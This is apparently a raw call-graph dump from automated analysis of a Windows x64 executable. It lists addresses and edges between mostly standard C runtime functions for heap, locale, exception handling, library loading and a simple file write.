5305->5308 5313 7ff79cd680d0 __scrt_get_show_window_mode 5305->5313 5307 7ff79cd61b90 _log10_special 8 API calls 5306->5307 5309 7ff79cd67e15 5307->5309 5308->5306 5310 7ff79cd680c7 5308->5310 5309->5275 5309->5280 5311 7ff79cd680f6 GetCPInfo 5310->5311 5310->5313 5311->5306 5311->5313 5362 7ff79cd67ac0 5313->5362 5451 7ff79cd68588 EnterCriticalSection 5314->5451 5331 7ff79cd67758 5330->5331 5332 7ff79cd67753 5330->5332 5331->5332 5333 7ff79cd66b84 std::_Xinvalid_argument 47 API calls 5331->5333 5332->5299 5332->5300 5334 7ff79cd67773 5333->5334 5338 7ff79cd6a2d8 5334->5338 5339 7ff79cd6a2ed 5338->5339 5340 7ff79cd67796 5338->5340 5339->5340 5346 7ff79cd6941c 5339->5346 5342 7ff79cd6a344 5340->5342 5343 7ff79cd6a359 5342->5343 5344 7ff79cd6a36c 5342->5344 5343->5344 5359 7ff79cd68030 5343->5359 5344->5332 5347 7ff79cd66b84 std::_Xinvalid_argument 47 API calls 5346->5347 5348 7ff79cd6942b 5347->5348 5349 7ff79cd69476 5348->5349 5358 7ff79cd68588 EnterCriticalSection 5348->5358 5349->5340 5360 7ff79cd66b84 std::_Xinvalid_argument 47 API calls 5359->5360 5361 7ff79cd68039 5360->5361 5363 7ff79cd67afd GetCPInfo 5362->5363 5364 7ff79cd67bf3 5362->5364 5363->5364 5369 7ff79cd67b10 5363->5369 5365 7ff79cd61b90 _log10_special 8 API calls 5364->5365 5367 7ff79cd67c92 5365->5367 5367->5306 5373 7ff79cd68f58 5369->5373 5372 7ff79cd6ac94 57 API calls 5372->5364 5374 7ff79cd67734 47 API calls 5373->5374 5375 7ff79cd68f9a 5374->5375 5393 7ff79cd68334 5375->5393 5377 7ff79cd68fd7 5380 7ff79cd61b90 _log10_special 8 API calls 5377->5380 5378 7ff79cd68fd0 5378->5377 5379 7ff79cd68ec4 std::_Xinvalid_argument 12 API calls 5378->5379 5381 7ff79cd69094 5378->5381 5384 7ff79cd69000 __scrt_get_show_window_mode 5378->5384 5379->5384 5382 7ff79cd67b87 5380->5382 5381->5377 5383 7ff79cd6716c __free_lconv_num 11 API calls 5381->5383 5388 7ff79cd6ac94 5382->5388 5383->5377 5384->5381 5385 7ff79cd68334 MultiByteToWideChar 5384->5385 5386 7ff79cd69076 5385->5386 5386->5381 5387 7ff79cd6907a GetStringTypeW 5386->5387 5387->5381 5389 7ff79cd67734 47 API calls 5388->5389 5390 7ff79cd6acb9 5389->5390 5396 7ff79cd6a960 5390->5396 5395 7ff79cd6833d MultiByteToWideChar 5393->5395 5397 7ff79cd6a9a1 5396->5397 5398 7ff79cd68334 MultiByteToWideChar 5397->5398 5401 7ff79cd6a9eb 5398->5401 5399 7ff79cd6ac69 5400 7ff79cd61b90 _log10_special 8 API calls 5399->5400 5402 7ff79cd67bba 5400->5402 5401->5399 5403 7ff79cd68ec4 std::_Xinvalid_argument 12 API calls 5401->5403 5405 7ff79cd6aa23 5401->5405 5415 7ff79cd6ab21 5401->5415 5402->5372 5403->5405 5404 7ff79cd6716c __free_lconv_num 11 API calls 5404->5399 5406 7ff79cd68334 MultiByteToWideChar 5405->5406 5405->5415 5407 7ff79cd6aa96 5406->5407 5407->5415 5427 7ff79cd69798 5407->5427 5410 7ff79cd6aae1 5413 7ff79cd69798 7 API calls 5410->5413 5410->5415 5411 7ff79cd6ab32 5412 7ff79cd68ec4 std::_Xinvalid_argument 12 API calls 5411->5412 5414 7ff79cd6ac04 5411->5414 5417 7ff79cd6ab50 5411->5417 5412->5417 5413->5415 5414->5415 5416 7ff79cd6716c __free_lconv_num 11 API calls 5414->5416 5415->5399 5415->5404 5416->5415 5417->5415 5418 7ff79cd69798 7 API calls 5417->5418 5419 7ff79cd6abd0 5418->5419 5419->5414 5420 7ff79cd6ac06 5419->5420 5421 7ff79cd6abf0 5419->5421 5423 7ff79cd683c4 WideCharToMultiByte 5420->5423 5435 7ff79cd683c4 5421->5435 5424 7ff79cd6abfe 5423->5424 5424->5414 5425 7ff79cd6ac1e 5424->5425 5425->5415 5426 7ff79cd6716c __free_lconv_num 11 API calls 5425->5426 5426->5415 5438 7ff79cd694f4 5427->5438 5430 7ff79cd6983d 5448 7ff79cd69884 5430->5448 5431 7ff79cd697de LCMapStringEx 5432 7ff79cd6986f 5431->5432 5432->5410 5432->5411 5432->5415 5434 7ff79cd69847 LCMapStringW 5434->5432 5437 7ff79cd683e8 WideCharToMultiByte 5435->5437 5439 7ff79cd69551 5438->5439 5446 7ff79cd6954c __vcrt_FlsAlloc 5438->5446 5439->5430 5439->5431 5440 7ff79cd69581 LoadLibraryExW 5442 7ff79cd69656 5440->5442 5443 7ff79cd695a6 GetLastError 5440->5443 5441 7ff79cd69676 GetProcAddress 5441->5439 5445 7ff79cd69687 5441->5445 5442->5441 5444 7ff79cd6966d FreeLibrary 5442->5444 5443->5446 5444->5441 5445->5439 5446->5439 5446->5440 5446->5441 5447 7ff79cd695e0 LoadLibraryExW 5446->5447 5447->5442 5447->5446 5449 7ff79cd694f4 LoadLibraryExW GetLastError LoadLibraryExW FreeLibrary GetProcAddress 5448->5449 5450 7ff79cd698b2 5449->5450 5450->5434 5453 7ff79cd63333 5452->5453 5454 7ff79cd631a1 5452->5454 5460 7ff79cd64be4 5453->5460 5456 7ff79cd64a14 5454->5456 5457 7ff79cd64a3f 5456->5457 5458 7ff79cd64a43 5457->5458 5459 7ff79cd64a22 DeleteCriticalSection 5457->5459 5458->5220 5459->5457 5464 7ff79cd64a4c 5460->5464 5465 7ff79cd64b36 TlsFree 5464->5465 5470 7ff79cd64a90 __vcrt_FlsAlloc 5464->5470 5466 7ff79cd64abe LoadLibraryExW 5468 7ff79cd64b5d 5466->5468 5469 7ff79cd64adf GetLastError 5466->5469 5467 7ff79cd64b7d GetProcAddress 5467->5465 5468->5467 5471 7ff79cd64b74 FreeLibrary 5468->5471 5469->5470 5470->5465 5470->5466 5470->5467 5472 7ff79cd64b01 LoadLibraryExW 5470->5472 5471->5467 5472->5468 5472->5470 5493 7ff79cd6186c 5473->5493 5477 7ff79cd61912 std::_Xinvalid_argument 5501 7ff79cd65e24 5477->5501 5479 7ff79cd61930 std::_Xinvalid_argument 5507 7ff79cd61c98 5479->5507 5481 7ff79cd61f88 std::_Xinvalid_argument 7 API calls 5483 7ff79cd619c9 std::_Xinvalid_argument 5481->5483 5482 7ff79cd61948 _RTC_Initialize 5491 7ff79cd6199d std::_Xinvalid_argument 5482->5491 5512 7ff79cd61e48 5482->5512 5483->5163 5485 7ff79cd6195d std::_Xinvalid_argument 5515 7ff79cd65658 5485->5515 5489 7ff79cd61972 std::_Xinvalid_argument 5490 7ff79cd65f10 std::_Xinvalid_argument 47 API calls 5489->5490 5490->5491 5491->5481 5492 7ff79cd619b9 5491->5492 5492->5163 5542 7ff79cd62c90 5493->5542 5496 7ff79cd62eac 5497 7ff79cd62ecb 5496->5497 5498 7ff79cd62ef4 RtlPcToFileHeader 5497->5498 5499 7ff79cd62f16 RaiseException 5497->5499 5500 7ff79cd62f0c 5498->5500 5499->5477 5500->5499 5502 7ff79cd65e35 5501->5502 5503 7ff79cd65e3d 5502->5503 5504 7ff79cd670d4 _set_fmode 11 API calls 5502->5504 5503->5479 5505 7ff79cd65e4c 5504->5505 5506 7ff79cd6519c _invalid_parameter_noinfo 47 API calls 5505->5506 5506->5503 5508 7ff79cd61ca9 5507->5508 5511 7ff79cd61cae std::_Xinvalid_argument __scrt_release_startup_lock 5507->5511 5509 7ff79cd61f88 std::_Xinvalid_argument 7 API calls 5508->5509 5508->5511 5510 7ff79cd61d22 5509->5510 5511->5482 5564 7ff79cd61e0c 5512->5564 5514 7ff79cd61e51 5514->5485 5516 7ff79cd65678 5515->5516 5517 7ff79cd61969 5515->5517 5518 7ff79cd65696 GetModuleFileNameW 5516->5518 5519 7ff79cd65680 5516->5519 5517->5491 5541 7ff79cd61f20 InitializeSListHead 5517->5541 5523 7ff79cd656c1 std::_Xinvalid_argument 5518->5523 5520 7ff79cd670d4 _set_fmode 11 API calls 5519->5520 5521 7ff79cd65685 5520->5521 5522 7ff79cd6519c _invalid_parameter_noinfo 47 API calls 5521->5522 5522->5517 5579 7ff79cd655f8 5523->5579 5526 7ff79cd65709 5527 7ff79cd670d4 _set_fmode 11 API calls 5526->5527 5528 7ff79cd6570e 5527->5528 5530 7ff79cd6716c __free_lconv_num 11 API calls 5528->5530 5529 7ff79cd65743 5533 7ff79cd6716c __free_lconv_num 11 API calls 5529->5533 5532 7ff79cd6571c 5530->5532 5531 7ff79cd65721 std::_Xinvalid_argument 5531->5529 5534 7ff79cd65788 5531->5534 5535 7ff79cd6576f 5531->5535 5532->5517 5533->5517 5538 7ff79cd6716c __free_lconv_num 11 API calls 5534->5538 5536 7ff79cd6716c __free_lconv_num 11 API calls 5535->5536 5537 7ff79cd65778 5536->5537 5539 7ff79cd6716c __free_lconv_num 11 API calls 5537->5539 5538->5529 5540 7ff79cd65784 5539->5540 5540->5517 5543 7ff79cd618a0 5542->5543 5544 7ff79cd62cb1 5542->5544 5543->5496 5544->5543 5545 7ff79cd62ce6 5544->5545 5548 7ff79cd6665c 5544->5548 5557 7ff79cd665f0 5545->5557 5549 7ff79cd66669 5548->5549 5550 7ff79cd66673 5548->5550 5549->5550 5555 7ff79cd6668e 5549->5555 5551 7ff79cd670d4 _set_fmode 11 API calls 5550->5551 5552 7ff79cd6667a 5551->5552 5553 7ff79cd6519c _invalid_parameter_noinfo 47 API calls 5552->5553 5554 7ff79cd66686 5553->5554 5554->5545 5555->5554 5556 7ff79cd670d4 _set_fmode 11 API calls 5555->5556 5556->5552 5558 7ff79cd6716c 5557->5558 5559 7ff79cd671a2 5558->5559 5560 7ff79cd67171 HeapFree 5558->5560 5559->5543 5560->5559 5561 7ff79cd6718c GetLastError 5560->5561 5562 7ff79cd67199 __free_lconv_num 5561->5562 5563 7ff79cd670d4 _set_fmode 11 API calls 5562->5563 5563->5559 5565 7ff79cd61e26 5564->5565 5567 7ff79cd61e1f std::_Xinvalid_argument 5564->5567 5568 7ff79cd66404 5565->5568 5567->5514 5571 7ff79cd66040 5568->5571 5578 7ff79cd68588 EnterCriticalSection 5571->5578 5580 7ff79cd65610 5579->5580 5584 7ff79cd65648 5579->5584 5581 7ff79cd670f4 _set_fmode 11 API calls 5580->5581 5580->5584 5582 7ff79cd6563e 5581->5582 5583 7ff79cd6716c __free_lconv_num 11 API calls 5582->5583 5583->5584 5584->5526 5584->5531 5586 7ff79cd620e7 GetStartupInfoW 5585->5586 5586->5145 5590 7ff79cd61563 5587->5590 5588 7ff79cd61666 5647 7ff79cd61158 5588->5647 5590->5588 5592 7ff79cd61660 5590->5592 5593 7ff79cd6161e 5590->5593 5594 7ff79cd615ca 5590->5594 5597 7ff79cd61586 5590->5597 5641 7ff79cd610c0 5592->5641 5596 7ff79cd61bb0 51 API calls 5593->5596 5594->5592 5627 7ff79cd61bb0 5594->5627 5596->5597 5597->5174 5602 7ff79cd614e7 5601->5602 5603 7ff79cd61510 5601->5603 5602->5603 5604 7ff79cd651bc _invalid_parameter_noinfo_noreturn 47 API calls 5602->5604 5603->5178 5605 7ff79cd61534 5604->5605 5607 7ff79cd61197 CreateFileW 5606->5607 5608 7ff79cd61194 5606->5608 5609 7ff79cd611cc WriteFile CloseHandle 5607->5609 5610 7ff79cd611c8 5607->5610 5608->5607 5609->5610 5611 7ff79cd61b90 _log10_special 8 API calls 5610->5611 5612 7ff79cd61210 5611->5612 5612->5183 5614 7ff79cd61808 5613->5614 5617 7ff79cd616a4 5613->5617 5615 7ff79cd61158 63 API calls 5614->5615 5616 7ff79cd6180e 5615->5616 5618 7ff79cd61802 5617->5618 5619 7ff79cd6173e 5617->5619 5620 7ff79cd616e3 5617->5620 5624 7ff79cd616f8 5617->5624 5622 7ff79cd610c0 Concurrency::cancel_current_task 51 API calls 5618->5622 5621 7ff79cd61bb0 51 API calls 5619->5621 5620->5618 5623 7ff79cd61bb0 51 API calls 5620->5623 5621->5624 5622->5614 5623->5624 5625 7ff79cd651bc _invalid_parameter_noinfo_noreturn 47 API calls 5624->5625 5626 7ff79cd617b6 5624->5626 5625->5618 5626->5176 5628 7ff79cd61bbb 5627->5628 5629 7ff79cd615df 5628->5629 5630 7ff79cd65fc0 _set_fmode 2 API calls 5628->5630 5631 7ff79cd61bda 5628->5631 5629->5597 5636 7ff79cd651bc 5629->5636 5630->5628 5634 7ff79cd61be5 5631->5634 5650 7ff79cd623c8 5631->5650 5633 7ff79cd610c0 Concurrency::cancel_current_task 51 API calls 5635 7ff79cd61beb 5633->5635 5634->5633 5637 7ff79cd65034 _invalid_parameter_noinfo_noreturn 47 API calls 5636->5637 5638 7ff79cd651d5 5637->5638 5639 7ff79cd651ec _invalid_parameter_noinfo_noreturn 17 API calls 5638->5639 5640 7ff79cd651ea 5639->5640 5642 7ff79cd610ce std::bad_alloc::bad_alloc 5641->5642 5643 7ff79cd62eac std::_Xinvalid_argument 2 API calls 5642->5643 5644 7ff79cd610df 5643->5644 5645 7ff79cd62c90 __std_exception_copy 49 API calls 5644->5645 5646 7ff79cd61109 5645->5646 5646->5588 5648 7ff79cd618f0 std::_Xinvalid_argument 63 API calls 5647->5648 5649 7ff79cd61168 5648->5649 5651 7ff79cd623d6 std::bad_alloc::bad_alloc 5650->5651 5652 7ff79cd62eac std::_Xinvalid_argument 2 API calls 5651->5652 5653 7ff79cd623e7 5652->5653 5951 7ff79cd62178 5952 7ff79cd621ac 5951->5952 5953 7ff79cd62190 5951->5953 5953->5952 5960 7ff79cd62e78 5953->5960 5958 7ff79cd665c4 47 API calls 5959 7ff79cd621d2 5958->5959 5961 7ff79cd63200 _CreateFrameInfo 58 API calls 5960->5961 5962 7ff79cd621be 5961->5962 5963 7ff79cd62e8c 5962->5963 5964 7ff79cd63200 _CreateFrameInfo 58 API calls 5963->5964 5965 7ff79cd621ca 5964->5965 5965->5958 6323 7ff79cd6ca38 6324 7ff79cd6ca49 CloseHandle 6323->6324 6325 7ff79cd6ca4f 6323->6325 6324->6325 5705 7ff79cd66a04 5706 7ff79cd66a09 5705->5706 5707 7ff79cd66a1e 5705->5707 5711 7ff79cd66a24 5706->5711 5712 7ff79cd66a66 5711->5712 5713 7ff79cd66a6e 5711->5713 5715 7ff79cd6716c __free_lconv_num 11 API calls 5712->5715 5714 7ff79cd6716c __free_lconv_num 11 API calls 5713->5714 5716 7ff79cd66a7b 5714->5716 5715->5713 5717 7ff79cd6716c __free_lconv_num 11 API calls 5716->5717 5718 7ff79cd66a88 5717->5718 5719 7ff79cd6716c __free_lconv_num 11 API calls 5718->5719 5720 7ff79cd66a95 5719->5720 5721 7ff79cd6716c __free_lconv_num 11 API calls 5720->5721 5722 7ff79cd66aa2 5721->5722 5723 7ff79cd6716c __free_lconv_num 11 API calls 5722->5723 5724 7ff79cd66aaf 5723->5724 5725 7ff79cd6716c __free_lconv_num 11 API calls 5724->5725 5726 7ff79cd66abc 5725->5726 5727 7ff79cd6716c __free_lconv_num 11 API calls 5726->5727 5728 7ff79cd66ac9 5727->5728 5729 7ff79cd6716c __free_lconv_num 11 API calls 5728->5729 5730 7ff79cd66ad9 5729->5730 5731 7ff79cd6716c __free_lconv_num 11 API calls 5730->5731 5732 7ff79cd66ae9 5731->5732 5737 7ff79cd668d4 5732->5737 5751 7ff79cd68588 EnterCriticalSection 5737->5751 5753 7ff79cd64304 5754 7ff79cd63200 _CreateFrameInfo 58 API calls 5753->5754 5755 7ff79cd64339 5754->5755 5756 7ff79cd63200 _CreateFrameInfo 58 API calls 5755->5756 5757 7ff79cd64347 __except_validate_context_record 5756->5757 5758 7ff79cd63200 _CreateFrameInfo 58 API calls 5757->5758 5759 7ff79cd6438b 5758->5759 5760 7ff79cd63200 _CreateFrameInfo 58 API calls 5759->5760 5761 7ff79cd64394 5760->5761 5762 7ff79cd63200 _CreateFrameInfo 58 API calls 5761->5762 5763 7ff79cd6439d 5762->5763 5776 7ff79cd62b20 5763->5776 5766 7ff79cd63200 _CreateFrameInfo 58 API calls 5767 7ff79cd643cd __CxxCallCatchBlock 5766->5767 5768 7ff79cd62b5c __CxxCallCatchBlock 58 API calls 5767->5768 5772 7ff79cd6447e 5768->5772 5769 7ff79cd644a7 __CxxCallCatchBlock 5770 7ff79cd63200 _CreateFrameInfo 58 API calls 5769->5770 5771 7ff79cd644ba 5770->5771 5773 7ff79cd63200 _CreateFrameInfo 58 API calls 5771->5773 5772->5769 5774 7ff79cd62dbc __CxxCallCatchBlock 58 API calls 5772->5774 5775 7ff79cd644c3 5773->5775 5774->5769 5777 7ff79cd63200 _CreateFrameInfo 58 API calls 5776->5777 5778 7ff79cd62b31 5777->5778 5779 7ff79cd63200 _CreateFrameInfo 58 API calls 5778->5779 5780 7ff79cd62b3c 5778->5780 5779->5780 5781 7ff79cd63200 _CreateFrameInfo 58 API calls 5780->5781 5782 7ff79cd62b4d 5781->5782 5782->5766 5782->5767 5966 7ff79cd66e84 5967 7ff79cd66e94 5966->5967 5968 7ff79cd66e9f __vcrt_uninitialize_ptd 5967->5968 5969 7ff79cd66cfc _set_fmode 11 API calls 5967->5969 5969->5968 5970 7ff79cd66484 5973 7ff79cd659e4 5970->5973 5980 7ff79cd659ac 5973->5980 5978 7ff79cd65968 11 API calls 5979 7ff79cd65a17 5978->5979 5981 7ff79cd659bc 5980->5981 5982 7ff79cd659c1 5980->5982 5983 7ff79cd65968 11 API calls 5981->5983 5984 7ff79cd659c8 5982->5984 5983->5982 5985 7ff79cd659dd 5984->5985 5986 7ff79cd659d8 5984->5986 5985->5978 5987 7ff79cd65968 11 API calls 5986->5987 5987->5985 6326 7ff79cd6a144 6327 7ff79cd6a16e 6326->6327 6328 7ff79cd670f4 _set_fmode 11 API calls 6327->6328 6329 7ff79cd6a18d 6328->6329 6330 7ff79cd6716c __free_lconv_num 11 API calls 6329->6330 6331 7ff79cd6a19b 6330->6331 6332 7ff79cd670f4 _set_fmode 11 API calls 6331->6332 6336 7ff79cd6a1c5 6331->6336 6334 7ff79cd6a1b7 6332->6334 6335 7ff79cd6716c __free_lconv_num 11 API calls 6334->6335 6335->6336 6337 7ff79cd6a1ce 6336->6337 6338 7ff79cd69728 6336->6338 6339 7ff79cd694f4 5 API calls 6338->6339 6340 7ff79cd6975e 6339->6340 6341 7ff79cd6977d InitializeCriticalSectionAndSpinCount 6340->6341 6342 7ff79cd69763 6340->6342 6341->6342 6342->6336 5783 7ff79cd61000 5784 7ff79cd62c90 __std_exception_copy 49 API calls 5783->5784 5785 7ff79cd61029 5784->5785 5786 7ff79cd6d700 5787 7ff79cd6d738 __GSHandlerCheckCommon 5786->5787 5788 7ff79cd6d764 5787->5788 5790 7ff79cd62c08 5787->5790 5791 7ff79cd63200 _CreateFrameInfo 58 API calls 5790->5791 5792 7ff79cd62c32 5791->5792 5793 7ff79cd63200 _CreateFrameInfo 58 API calls 5792->5793 5794 7ff79cd62c3f 5793->5794 5795 7ff79cd63200 _CreateFrameInfo 58 API calls 5794->5795 5796 7ff79cd62c48 5795->5796 5796->5788 5988 7ff79cd6e280 5991 7ff79cd65234 5988->5991 5992 7ff79cd66cfc _set_fmode 11 API calls 5991->5992 5993 7ff79cd65252 5992->5993 5994 7ff79cd6d780 6004 7ff79cd62f54 5994->6004 5996 7ff79cd6d7a8 5998 7ff79cd63200 _CreateFrameInfo 58 API calls 5999 7ff79cd6d7b8 5998->5999 6000 7ff79cd63200 _CreateFrameInfo 58 API calls 5999->6000 6001 7ff79cd6d7c1 6000->6001 6002 7ff79cd665c4 47 API calls 6001->6002 6003 7ff79cd6d7ca 6002->6003 6006 7ff79cd62f84 __CxxCallCatchBlock _IsNonwritableInCurrentImage __except_validate_context_record 6004->6006 6005 7ff79cd63085 6005->5996 6005->5998 6006->6005 6007 7ff79cd63048 RtlUnwindEx 6006->6007 6007->6006 6343 7ff79cd68540 6344 7ff79cd68548 6343->6344 6345 7ff79cd69728 6 API calls 6344->6345 6346 7ff79cd68579 6344->6346 6347 7ff79cd68575 6344->6347 6345->6344 6349 7ff79cd685a4 6346->6349 6350 7ff79cd685cf 6349->6350 6351 7ff79cd685d3 6350->6351 6352 7ff79cd685b2 DeleteCriticalSection 6350->6352 6351->6347 6352->6350 6353 7ff79cd6c24b 6354 7ff79cd6c28b 6353->6354 6355 7ff79cd6c4f0 6353->6355 6354->6355 6357 7ff79cd6c2bf 6354->6357 6358 7ff79cd6c4d2 6354->6358 6356 7ff79cd6c4e6 6355->6356 6360 7ff79cd6d000 _log10_special 19 API calls 6355->6360 6361 7ff79cd6d000 6358->6361 6360->6356 6364 7ff79cd6d020 6361->6364 6365 7ff79cd6d03a 6364->6365 6366 7ff79cd6d01b 6365->6366 6368 7ff79cd6ce60 6365->6368 6366->6356 6369 7ff79cd6cea0 _raise_exc _log10_special 6368->6369 6370 7ff79cd6cf49 6369->6370 6371 7ff79cd6cf19 6369->6371 6381 7ff79cd6d450 6370->6381 6377 7ff79cd6cd3c 6371->6377 6374 7ff79cd6cf47 _log10_special 6375 7ff79cd61b90 _log10_special 8 API calls 6374->6375 6376 7ff79cd6cf71 6375->6376 6376->6366 6378 7ff79cd6cd80 _log10_special 6377->6378 6379 7ff79cd6cd95 6378->6379 6380 7ff79cd6d450 _log10_special 11 API calls 6378->6380 6379->6374 6380->6379 6382 7ff79cd6d459 6381->6382 6383 7ff79cd6d470 6381->6383 6385 7ff79cd670d4 _set_fmode 11 API calls 6382->6385 6386 7ff79cd6d468 6382->6386 6384 7ff79cd670d4 _set_fmode 11 API calls 6383->6384 6384->6386 6385->6386 6386->6374 5114 7ff79cd65c0d 5126 7ff79cd665c4 5114->5126 5116 7ff79cd65c12 5117 7ff79cd65c39 GetModuleHandleW 5116->5117 5118 7ff79cd65c83 5116->5118 5117->5118 5123 7ff79cd65c46 5117->5123 5119 7ff79cd65b10 11 API calls 5118->5119 5120 7ff79cd65cbf 5119->5120 5121 7ff79cd65cc6 5120->5121 5122 7ff79cd65cdc 11 API calls 5120->5122 5124 7ff79cd65cd8 5122->5124 5123->5118 5125 7ff79cd65d34 GetModuleHandleExW GetProcAddress FreeLibrary 5123->5125 5125->5118 5127 7ff79cd66b84 std::_Xinvalid_argument 47 API calls 5126->5127 5128 7ff79cd665cd 5127->5128 5129 7ff79cd66604 __GetCurrentState 47 API calls 5128->5129 5130 7ff79cd665ed 5129->5130 5800 7ff79cd6830c GetCommandLineA GetCommandLineW 6387 7ff79cd61048 6390 7ff79cd62d20 6387->6390 6389 7ff79cd6106a 6391 7ff79cd62d37 6390->6391 6392 7ff79cd62d2f 6390->6392 6391->6389 6393 7ff79cd665f0 __std_exception_copy 13 API calls 6392->6393 6393->6391 5801 7ff79cd69908 5802 7ff79cd69941 5801->5802 5803 7ff79cd69912 5801->5803 5803->5802 5804 7ff79cd69927 FreeLibrary 5803->5804 5804->5803 6008 7ff79cd64690 6017 7ff79cd645c3 __CxxCallCatchBlock __FrameHandler3::GetHandlerSearchState 6008->6017 6009 7ff79cd646b7 6010 7ff79cd63200 _CreateFrameInfo 58 API calls 6009->6010 6012 7ff79cd646bc 6010->6012 6011 7ff79cd646f2 6013 7ff79cd66604 __GetCurrentState 47 API calls 6011->6013 6014 7ff79cd63200 _CreateFrameInfo 58 API calls 6012->6014 6016 7ff79cd646c7 6012->6016 6013->6016 6014->6016 6015 7ff79cd646d4 __FrameHandler3::GetHandlerSearchState 6016->6015 6018 7ff79cd66604 __GetCurrentState 47 API calls 6016->6018 6017->6009 6017->6011 6020 7ff79cd62bb0 58 API calls Is_bad_exception_allowed 6017->6020 6022 7ff79cd62bd8 6017->6022 6019 7ff79cd646fd 6018->6019 6020->6017 6023 7ff79cd63200 _CreateFrameInfo 58 API calls 6022->6023 6024 7ff79cd62be6 6023->6024 6024->6017 5896 7ff79cd68bd0 5897 7ff79cd68bdc 5896->5897 5898 7ff79cd68c03 5897->5898 5900 7ff79cd68704 5897->5900 5901 7ff79cd68709 5900->5901 5902 7ff79cd68744 5900->5902 5903 7ff79cd6873c 5901->5903 5904 7ff79cd6872a DeleteCriticalSection 5901->5904 5902->5897 5905 7ff79cd6716c __free_lconv_num 11 API calls 5903->5905 5904->5903 5904->5904 5905->5902 4836 7ff79cd657dc 4837 7ff79cd657f5 4836->4837 4838 7ff79cd657f1 4836->4838 4849 7ff79cd684a4 GetEnvironmentStringsW 4837->4849 4841 7ff79cd6580e 4856 7ff79cd6584c 4841->4856 4842 7ff79cd65802 4875 7ff79cd6716c 4842->4875 4846 7ff79cd6716c __free_lconv_num 11 API calls 4847 7ff79cd65835 4846->4847 4848 7ff79cd6716c __free_lconv_num 11 API calls 4847->4848 4848->4838 4850 7ff79cd657fa 4849->4850 4851 7ff79cd684c8 4849->4851 4850->4841 4850->4842 4881 7ff79cd68ec4 4851->4881 4853 7ff79cd684ff 4854 7ff79cd6716c __free_lconv_num 11 API calls 4853->4854 4855 7ff79cd6851f FreeEnvironmentStringsW 4854->4855 4855->4850 4857 7ff79cd65874 4856->4857 4858 7ff79cd670f4 _set_fmode 11 API calls 4857->4858 4870 7ff79cd658af 4858->4870 4859 7ff79cd658b7 4860 7ff79cd6716c __free_lconv_num 11 API calls 4859->4860 4861 7ff79cd65816 4860->4861 4861->4846 4862 7ff79cd65931 4863 7ff79cd6716c __free_lconv_num 11 API calls 4862->4863 4863->4861 4864 7ff79cd670f4 _set_fmode 11 API calls 4864->4870 4865 7ff79cd65920 4953 7ff79cd65968 4865->4953 4869 7ff79cd6716c __free_lconv_num 11 API calls 4869->4859 4870->4859 4870->4862 4870->4864 4870->4865 4871 7ff79cd65954 4870->4871 4872 7ff79cd6716c __free_lconv_num 11 API calls 4870->4872 4944 7ff79cd66ee4 4870->4944 4959 7ff79cd651ec IsProcessorFeaturePresent 4871->4959 4872->4870 4876 7ff79cd671a2 4875->4876 4877 7ff79cd67171 HeapFree 4875->4877 4876->4838 4877->4876 4878 7ff79cd6718c GetLastError 4877->4878 4879 7ff79cd67199 __free_lconv_num 4878->4879 4880 7ff79cd670d4 _set_fmode 9 API calls 4879->4880 4880->4876 4882 7ff79cd68f0f 4881->4882 4887 7ff79cd68ed3 _set_fmode 4881->4887 4892 7ff79cd670d4 4882->4892 4884 7ff79cd68ef6 HeapAlloc 4885 7ff79cd68f0d 4884->4885 4884->4887 4886 7ff79cd68f14 4885->4886 4886->4853 4887->4882 4887->4884 4889 7ff79cd65fc0 4887->4889 4895 7ff79cd66000 4889->4895 4901 7ff79cd66cfc GetLastError 4892->4901 4894 7ff79cd670dd 4894->4886 4900 7ff79cd68588 EnterCriticalSection 4895->4900 4902 7ff79cd66d3d FlsSetValue 4901->4902 4907 7ff79cd66d20 4901->4907 4903 7ff79cd66d2d SetLastError 4902->4903 4904 7ff79cd66d4f 4902->4904 4903->4894 4918 7ff79cd670f4 4904->4918 4907->4902 4907->4903 4909 7ff79cd66d7c FlsSetValue 4912 7ff79cd66d88 FlsSetValue 4909->4912 4913 7ff79cd66d9a 4909->4913 4910 7ff79cd66d6c FlsSetValue 4911 7ff79cd66d75 4910->4911 4914 7ff79cd6716c __free_lconv_num 5 API calls 4911->4914 4912->4911 4925 7ff79cd66934 4913->4925 4914->4903 4919 7ff79cd67105 _set_fmode 4918->4919 4920 7ff79cd67156 4919->4920 4921 7ff79cd6713a HeapAlloc 4919->4921 4924 7ff79cd65fc0 _set_fmode 2 API calls 4919->4924 4922 7ff79cd670d4 _set_fmode 10 API calls 4920->4922 4921->4919 4923 7ff79cd66d5e 4921->4923 4922->4923 4923->4909 4923->4910 4924->4919 4930 7ff79cd6680c 4925->4930 4942 7ff79cd68588 EnterCriticalSection 4930->4942 4945 7ff79cd66efb 4944->4945 4946 7ff79cd66ef1 4944->4946 4947 7ff79cd670d4 _set_fmode 11 API calls 4945->4947 4946->4945 4951 7ff79cd66f17 4946->4951 4948 7ff79cd66f03 4947->4948 4963 7ff79cd6519c 4948->4963 4950 7ff79cd66f0f 4950->4870 4951->4950 4952 7ff79cd670d4 _set_fmode 11 API calls 4951->4952 4952->4948 4954 7ff79cd6596d 4953->4954 4955 7ff79cd65928 4953->4955 4956 7ff79cd65996 4954->4956 4957 7ff79cd6716c __free_lconv_num 11 API calls 4954->4957 4955->4869 4958 7ff79cd6716c __free_lconv_num 11 API calls 4956->4958 4957->4954 4958->4955 4960 7ff79cd651ff 4959->4960 4961 7ff79cd64ed0 _invalid_parameter_noinfo_noreturn 14 API calls 4960->4961 4962 7ff79cd6521a GetCurrentProcess TerminateProcess 4961->4962 4966 7ff79cd65034 4963->4966 4967 7ff79cd6505f 4966->4967 4974 7ff79cd650d0 4967->4974 4969 7ff79cd65086 4970 7ff79cd650a9 4969->4970 4984 7ff79cd64db0 4969->4984 4971 7ff79cd650be 4970->4971 4973 7ff79cd64db0 _invalid_parameter_noinfo_noreturn 47 API calls 4970->4973 4971->4950 4973->4971 4993 7ff79cd64e18 4974->4993 4979 7ff79cd6510b 4979->4969 4980 7ff79cd651ec _invalid_parameter_noinfo_noreturn 17 API calls 4981 7ff79cd6519b 4980->4981 4982 7ff79cd65034 _invalid_parameter_noinfo_noreturn 47 API calls 4981->4982 4983 7ff79cd651b5 4982->4983 4983->4969 4985 7ff79cd64e03 4984->4985 4986 7ff79cd64dc3 GetLastError 4984->4986 4985->4970 4987 7ff79cd64dd3 4986->4987 4988 7ff79cd66dc4 _invalid_parameter_noinfo_noreturn 16 API calls 4987->4988 4989 7ff79cd64dee SetLastError 4988->4989 4989->4985 4990 7ff79cd64e11 4989->4990 5019 7ff79cd66604 4990->5019 4994 7ff79cd64e34 GetLastError 4993->4994 4995 7ff79cd64e6f 4993->4995 